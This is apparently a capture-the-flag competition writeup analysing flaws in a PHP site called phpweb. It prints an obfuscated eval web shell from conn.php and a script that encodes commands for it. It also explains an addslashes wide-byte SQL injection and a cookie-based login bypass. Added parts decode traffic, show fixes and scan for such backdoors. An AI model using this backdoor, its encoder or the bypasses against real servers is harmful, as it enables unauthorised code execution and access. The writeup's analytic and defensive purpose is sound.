Guizhou Province Cyber Security Competition Team Writeup: phpweb part

0x01 Obfuscated backdoor # conn.php

First, drop the source into D Shield for a scan.

Opening conn.php reveals a string of code appended at the bottom:

Analysis of this code:

First, compare the output of a few simple variables.

$s holds the output of create_function.

Line 29 shows the anonymous function invoking the code in $q, so we print the contents of $q.

The contents of $q are as follows:

$k="5ac91f7d";$kh="b9615a29bc1d";$kf="24d0b67c2c91";$p="9GmIEgwZ7HiEeclS";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if(@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1){@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}

After formatting, the code reads as follows:

The data comes in through php://input and has to match the regular expression (preg_match must return 1) before execution continues.

We need to know a few functions:

ob_start: starts PHP output buffering

gzcompress: compression function

gzuncompress: decompression function

ob_get_contents: fetches the buffered output

x is the obfuscation routine (a repeating-key XOR, as the code shows); exactly how it obfuscates does not matter here.

All we need to know is that line 19 base64-decodes, XOR-decodes and decompresses what it received, so we do the reverse: compress, XOR and base64-encode.

For example, suppose we now want to encrypt phpinfo();

The reversing code is as follows:

<?php
// Constants recovered from the decoded $q in conn.php
$k="5ac91f7d";
$kh="b9615a29bc1d";
$kf="24d0b67c2c91";
$p="9GmIEgwZ7HiEeclS";
// Repeating-key XOR copied from the backdoor. The original uses the brace
// offset syntax $t{$i}, which PHP 8 removed, so brackets are used here.
function x($t,$k){
    $c=strlen($k);
    $l=strlen($t);
    $o="";
    for($i=0;$i<$l;){
        for($j=0;($j<$c&&$i<$l);$j++,$i++){
            $o.=$t[$i]^$k[$j];
        }
    }
    return $o;
}
// Reverse of line 19 of the backdoor: compress, XOR, then base64-encode
$r=@base64_encode(@x(@gzcompress('phpinfo();'),$k));
echo $r;

The string obtained is: Tf1I8Rmu+y/+trONN2YioDbg

Finally, wrap it with $kh and $kf,

which gives b9615a29bc1dTf1I8Rmu+y/+trONN2YioDbg24d0b67c2c91

Send this as the body of the POST request.
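The following Python script is an added example; it is not part of the original writeup or of the phpweb source. It models the wire format of the conn.php backdoor so that an analyst who finds this fragment can read what was sent through it in captured traffic: a request body is kh + base64(x(gzcompress(code))) + kf, and the reply is p + kh + base64(x(gzcompress(output))) + kf. The constants are the ones recovered above; wrap_request mirrors the writer's PHP script and serves to confirm the constants reproduce the string shown; the sample reply is constructed here for illustration.

```python
import base64
import re
import zlib
from typing import Optional

# Constants recovered from the decoded $q in conn.php (values from the writeup).
K = b"5ac91f7d"
KH = b"b9615a29bc1d"
KF = b"24d0b67c2c91"
P = b"9GmIEgwZ7HiEeclS"


def x(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, identical to the backdoor's x(); it is its own inverse."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def wrap_request(php_code: bytes) -> bytes:
    """Mirror of the writer's PHP script: gzcompress, XOR, base64, then add the kh/kf markers."""
    return KH + base64.b64encode(x(zlib.compress(php_code), K)) + KF


def unwrap_request(body: bytes) -> Optional[bytes]:
    """Recover the PHP code from a POST body using the same regex and decoding chain as line 19."""
    m = re.search(re.escape(KH) + rb"(.+)" + re.escape(KF), body)
    if m is None:
        return None
    try:
        return zlib.decompress(x(base64.b64decode(m.group(1), validate=True), K))
    except (ValueError, zlib.error):
        # not base64, or the XOR key is wrong so the zlib stream is garbage
        return None


def unwrap_response(body: bytes) -> Optional[bytes]:
    """Recover the command output from the reply: p + kh + base64(x(gzcompress(out))) + kf."""
    m = re.search(re.escape(P + KH) + rb"(.+?)" + re.escape(KF), body)
    if m is None:
        return None
    try:
        return zlib.decompress(x(base64.b64decode(m.group(1), validate=True), K))
    except (ValueError, zlib.error):
        return None


# Constructed sample reply, built the way the backdoor's print("$p$kh$r$kf") builds it.
SAMPLE_OUTPUT = b"PHP Version 7.2.0 (constructed sample output)"
SAMPLE_RESPONSE = P + KH + base64.b64encode(x(zlib.compress(SAMPLE_OUTPUT), K)) + KF


if __name__ == "__main__":
    print(wrap_request(b"phpinfo();").decode())
    print(unwrap_request(b"b9615a29bc1dTf1I8Rmu+y/+trONN2YioDbg24d0b67c2c91"))
    print(unwrap_response(SAMPLE_RESPONSE))
```

Because x() is a plain XOR with a key stored in the file, anyone holding conn.php can decode both directions of the traffic; that is also why, once the file is found, request logs or a packet capture of POSTs to it reveal exactly which commands were run.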

 

0x02 Backdoor via backend upload # up.class.php

Line 7 of the code shows that php is in the list of uploadable types as well;

Next, look at where this class is called.

Judging by the directory listing, the callers are basically all in the admin backend.

Reproducing the environment:

Uploading turned out to be broken, so the upload function presumably does not work; uploads only go through the ueditor editor, so this point can only be described as void;

0x03 SQL injection # conntent.php

The addslashes function can be bypassed: if the competition environment uses GBK encoding, injection is possible through a wide-byte bypass. Almost every other script uses this function too, so simply searching for addslashes finds nearly all of the SQL injection points;

There are a great many injection points; I won't write them out, because this program's source is large;
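To make the wide-byte point concrete, here is an added Python model (not code from the writeup or from phpweb) of what addslashes does at the byte level, and of why an escaper that decodes with the connection charset before escaping does not share the problem. The byte strings are constructed samples; addslashes, quotes_surviving and escape_chars are names chosen for this example. The mechanism applies to any multibyte charset whose trail byte may be 0x5C, GBK being the one the writeup names; the charset-aware behaviour modelled here is what mysqli_real_escape_string gives once mysqli_set_charset has been called, and prepared statements, which never splice the value into the SQL text at all, remain the actual fix.

```python
from typing import Optional


def addslashes(raw: bytes) -> bytes:
    """Byte-level model of PHP's addslashes(): a backslash before ', ", \\ and NUL, byte by byte."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def quotes_surviving(escaped: bytes, charset: str) -> int:
    """Count single quotes left unescaped once the bytes are read as characters in the given
    charset, which is how a SQL parser with that connection charset reads them."""
    text = escaped.decode(charset, errors="replace")
    count, i = 0, 0
    while i < len(text):
        if text[i] == "\\":
            i += 2  # a backslash consumes the following character
            continue
        if text[i] == "'":
            count += 1
        i += 1
    return count


def escape_chars(raw: bytes, charset: str) -> Optional[bytes]:
    """Charset-aware escaping: decode first (rejecting malformed input), escape per character,
    re-encode. Returns None when the input is not valid in the charset."""
    try:
        text = raw.decode(charset)
    except UnicodeDecodeError:
        return None
    escaped = "".join("\\" + ch if ch in "'\"\\\x00" else ch for ch in text)
    return escaped.encode(charset)


# Constructed inputs: a lone 0xBF lead byte followed by a quote, and a complete two-byte
# GBK character (BF 5C) followed by a quote.
LEAD_BYTE_THEN_QUOTE = b"\xbf'"
GBK_CHAR_THEN_QUOTE = b"\xbf\x5c'"


if __name__ == "__main__":
    # addslashes turns BF 27 into BF 5C 27; under GBK the parser reads BF 5C as one
    # character and the quote is back in play.
    print(addslashes(LEAD_BYTE_THEN_QUOTE).hex(),
          quotes_surviving(addslashes(LEAD_BYTE_THEN_QUOTE), "gbk"))
    print(escape_chars(LEAD_BYTE_THEN_QUOTE, "gbk"))
    print(quotes_surviving(escape_chars(GBK_CHAR_THEN_QUOTE, "gbk"), "gbk"))
```

The second sample shows the same defect from the other side: a legitimate GBK character whose trail byte is 0x5C gets its trail byte "escaped" by addslashes, which again leaves the following quote unescaped, whereas the character-level escaper keeps the pairing of backslash and quote intact.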

0x04 Permission bypass # checklogin.php

The check he wrote is a bit funny.

It only tests whether $_COOKIE is empty.

So as long as the user field in the request is non-empty, you are through (x-forwarded-for is a header I usually like to add; it can be ignored).
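As an added example (not code from the writeup or from phpweb), the following Python puts the two checks side by side: the presence test that checklogin.php effectively performs, and verification of a server-signed, expiring session cookie, which is what a login check has to do instead. SECRET, issue_session and verified_user are names chosen for this example, and the secret value is a constructed placeholder that in a real deployment would live in server-side configuration.

```python
import hashlib
import hmac
from typing import Optional

# Server-side secret; constructed placeholder, never sent to the client.
SECRET = b"constructed-secret-keep-on-server"


def weak_is_logged_in(cookies: dict) -> bool:
    """What checklogin.php effectively does: any non-empty 'user' cookie counts as logged in."""
    return bool(cookies.get("user"))


def _tag(user: str, expires: int) -> str:
    """HMAC over the fields the server needs to trust, so a client cannot forge or edit them."""
    return hmac.new(SECRET, f"{user}|{expires}".encode(), hashlib.sha256).hexdigest()


def issue_session(user: str, now: int, ttl: int = 3600) -> str:
    """Build a session cookie value the server can later verify: user|expiry|hmac."""
    expires = now + ttl
    return f"{user}|{expires}|{_tag(user, expires)}"


def verified_user(cookies: dict, now: int) -> Optional[str]:
    """Return the user name only if the session cookie is well-formed, untampered and unexpired."""
    token = cookies.get("session", "")
    parts = token.rsplit("|", 2)
    if len(parts) != 3:
        return None
    user, expires, tag = parts
    if not expires.isdigit():
        return None
    # Constant-time comparison on bytes: no timing leak, and no TypeError on odd input.
    if not hmac.compare_digest(tag.encode(), _tag(user, int(expires)).encode()):
        return None
    if int(expires) <= now:
        return None
    return user


if __name__ == "__main__":
    print(weak_is_logged_in({"user": "1"}))          # True: presence alone passes
    token = issue_session("admin", now=1000)
    print(verified_user({"session": token}, now=1500))  # admin
    print(verified_user({"user": "1"}, now=1500))       # None: no signed session
```

The difference is where the trust lives: with the presence check the client decides whether it is logged in, while with the signed cookie only the holder of SECRET can mint a value that verifies, and the expiry bounds how long a stolen one is useful.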

 

 

The basic flaws of phpweb are the ones above. The initial difficulty was probably the PHP obfuscation; to patch the trojan you can delete that part. As far as I know, being able to log in is enough to get the flag. Automation is also very simple: write a script that fills the cookie field with user=1 in the request, extracts the flag with a regex and writes it to a TXT file, and combine that with Burp Suite's automatic flag submission.
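As an added example (not from the writeup or from phpweb), the following Python scanner is one way to find code like the conn.php fragment when cleaning a tree before deleting it: it scores every .php file by the combination of indicators the analysis above identified (reading php://input, eval over gzuncompress or base64_decode output, create_function, output buffering wrapped around the eval, and error-suppressed calls). The weights and threshold are choices made for this example, and the two sample sources are constructed inline; the backdoor sample is the decoded $q from conn.php.

```python
import re
from pathlib import Path
from typing import List, Tuple

# (label, pattern, weight). Weights and THRESHOLD are choices made for this example.
INDICATORS = [
    ("reads raw request body (php://input)", re.compile(r"php://input"), 3),
    ("eval over decoded or decompressed data",
     re.compile(r"@?eval\s*\(\s*@?(gzuncompress|base64_decode|gzinflate|str_rot13)\s*\("), 4),
    ("create_function (code built from a string)", re.compile(r"\bcreate_function\s*\("), 2),
    ("base64_decode", re.compile(r"\bbase64_decode\s*\("), 1),
    ("gzuncompress/gzinflate", re.compile(r"\b(gzuncompress|gzinflate)\s*\("), 1),
    ("output buffering wrapped around eval",
     re.compile(r"ob_start\s*\(.*?\beval\s*\(.*?ob_get_contents\s*\(", re.S), 2),
    ("error-suppressed eval/preg_match/file_get_contents",
     re.compile(r"@(eval|preg_match|file_get_contents)\s*\("), 1),
]
THRESHOLD = 6


def score_source(src: str) -> Tuple[int, List[str]]:
    """Sum the weights of every indicator present and return the matching labels."""
    hits = [(label, weight) for label, rx, weight in INDICATORS if rx.search(src)]
    return sum(w for _, w in hits), [label for label, _ in hits]


def scan_tree(root: str) -> List[Tuple[str, int, List[str]]]:
    """Walk a directory and report .php files scoring at or above THRESHOLD, highest first."""
    findings = []
    for path in Path(root).rglob("*.php"):
        try:
            src = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        total, labels = score_source(src)
        if total >= THRESHOLD:
            findings.append((str(path), total, labels))
    return sorted(findings, key=lambda f: -f[1])


# Constructed samples. BACKDOOR is the decoded $q from conn.php as shown above.
BACKDOOR = r'''$k="5ac91f7d";$kh="b9615a29bc1d";$kf="24d0b67c2c91";$p="9GmIEgwZ7HiEeclS";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if(@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1){@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'''
BENIGN = r'''<?php
$conn = mysqli_connect($dbhost, $dbuser, $dbpass, $dbname);
mysqli_set_charset($conn, "utf8");
$avatar = base64_decode($_POST["avatar"]);  // a decode on its own is not a finding
'''


if __name__ == "__main__":
    import sys
    for sample_name, sample in (("backdoor", BACKDOOR), ("benign", BENIGN)):
        print(sample_name, score_source(sample))
    if len(sys.argv) > 1:
        for path, total, labels in scan_tree(sys.argv[1]):
            print(f"{total:3d}  {path}  {labels}")
```

Scoring on the combination rather than on any single function keeps ordinary code that happens to call base64_decode or ob_start out of the report; files that do hit the threshold are the ones worth opening, and the conn.php fragment itself scores well above it.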


Origin: www.cnblogs.com/nul1/p/11516783.html